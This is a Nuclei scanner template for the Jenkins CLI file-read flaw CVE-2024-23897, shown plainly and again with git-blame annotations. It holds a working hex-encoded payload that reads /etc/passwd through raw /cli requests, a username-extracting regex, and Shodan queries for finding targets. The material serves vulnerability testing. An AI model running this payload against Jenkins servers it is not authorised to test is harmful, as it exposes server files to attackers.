nuclei-templates/javascript/cves/2024/CVE-2024-23897.yaml

id: CVE-2024-23897

info:
  name: Jenkins < 2.441 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
  reference:
    - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
    - https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
    - https://github.com/Mr-xn/Penetration_Testing_POC
    - https://github.com/forsaken0127/CVE-2024-23897
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-23897
    epss-score: 0.41536
    epss-percentile: 0.97188
    cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: jenkins
    product: jenkins
    shodan-query:
      - "product:\"Jenkins\""
      - cpe:"cpe:2.3:a:jenkins:jenkins"
      - http.favicon.hash:81586312
      - product:"jenkins"
    fofa-query: icon_hash=81586312
  tags: cve,cve2024,lfi,rce,jenkins,js
variables:
  payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/net');
      let name=(Host.includes(':') ? Host : Host+":80");
      let conn,conn2;
      try { conn = m.OpenTLS('tcp', name) } catch { conn=  m.Open('tcp', name)}
      conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
      try { conn2 = m.OpenTLS('tcp', name) } catch { conn2=  m.Open('tcp', name)}
      conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
      resp = conn.RecvString(1000)
    args:
      Body: "{{payload}}"
      Host: "{{Hostname}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(response, "No such agent \"")'

    extractors:
      - type: regex
        group: 1
        regex:
          - '\b([a-z_][a-z0-9_-]{0,31})\:x\:'
# digest: 490a0046304402206177320674364c9d4ca08784b566ee26f51797e931f44e2344b29753e9eb7f4f02200b80670626fb457ae4142d6b191740d2c0e7d499b6a08f246a375ddd7abc4e86:922c64590222798bb761d5b6d8e72950
Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) (#9025) * Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) * added extractor 2024-01-28 10:46:42 +00:00			`id: CVE-2024-23897`

			`info:`
			`name: Jenkins < 2.441 - Arbitrary File Read`
			`author: iamnoooob,rootxharsh,pdresearch`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`severity: high`
Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) (#9025) * Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) * added extractor 2024-01-28 10:46:42 +00:00			`description: \|`
			`Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.`
			`reference:`
			`- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314`
			`- https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/Mr-xn/Penetration_Testing_POC`
			`- https://github.com/forsaken0127/CVE-2024-23897`
			`- https://github.com/nomi-sec/PoC-in-GitHub`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cve-id: CVE-2024-23897`
			`epss-score: 0.41536`
			`epss-percentile: 0.97188`
			`cpe: cpe:2.3:a:jenkins:jenkins:::::lts:::*`
Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) (#9025) * Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) * added extractor 2024-01-28 10:46:42 +00:00			`metadata:`
TemplateMan Update [Mon Jan 29 11:58:34 UTC 2024] :robot: 2024-01-29 11:58:34 +00:00			`verified: true`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`max-request: 1`
			`vendor: jenkins`
			`product: jenkins`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- "product:\"Jenkins\""`
			`- cpe:"cpe:2.3:a:jenkins:jenkins"`
			`- http.favicon.hash:81586312`
			`- product:"jenkins"`
			`fofa-query: icon_hash=81586312`
Update CVE-2024-23897.yaml 2024-05-31 18:28:18 +00:00			`tags: cve,cve2024,lfi,rce,jenkins,js`
Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) (#9025) * Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) * added extractor 2024-01-28 10:46:42 +00:00			`variables:`
			`payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"`

			`javascript:`
JS pre-condition - update 2024-07-10 12:08:01 +00:00			`- pre-condition: \|`
			`isPortOpen(Host,Port);`
			`code: \|`
Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) (#9025) * Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) * added extractor 2024-01-28 10:46:42 +00:00			`let m = require('nuclei/net');`
			`let name=(Host.includes(':') ? Host : Host+":80");`
			`let conn,conn2;`
			`try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)}`
			`conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');`
			`try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)}`
			`conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)`
			`resp = conn.RecvString(1000)`
			`args:`
			`Body: "{{payload}}"`
			`Host: "{{Hostname}}"`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(response, "No such agent \"")'`

			`extractors:`
			`- type: regex`
			`group: 1`
			`regex:`
Auto Template Signing [Sun Jan 28 10:49:04 UTC 2024] :robot: 2024-01-28 10:49:04 +00:00			`- '\b([a-z_][a-z0-9_-]{0,31})\:x\:'`
Auto Template Signing [Wed Jul 10 12:45:27 UTC 2024] :robot: 2024-07-10 12:45:27 +00:00			`# digest: 490a0046304402206177320674364c9d4ca08784b566ee26f51797e931f44e2344b29753e9eb7f4f02200b80670626fb457ae4142d6b191740d2c0e7d499b6a08f246a375ddd7abc4e86:922c64590222798bb761d5b6d8e72950`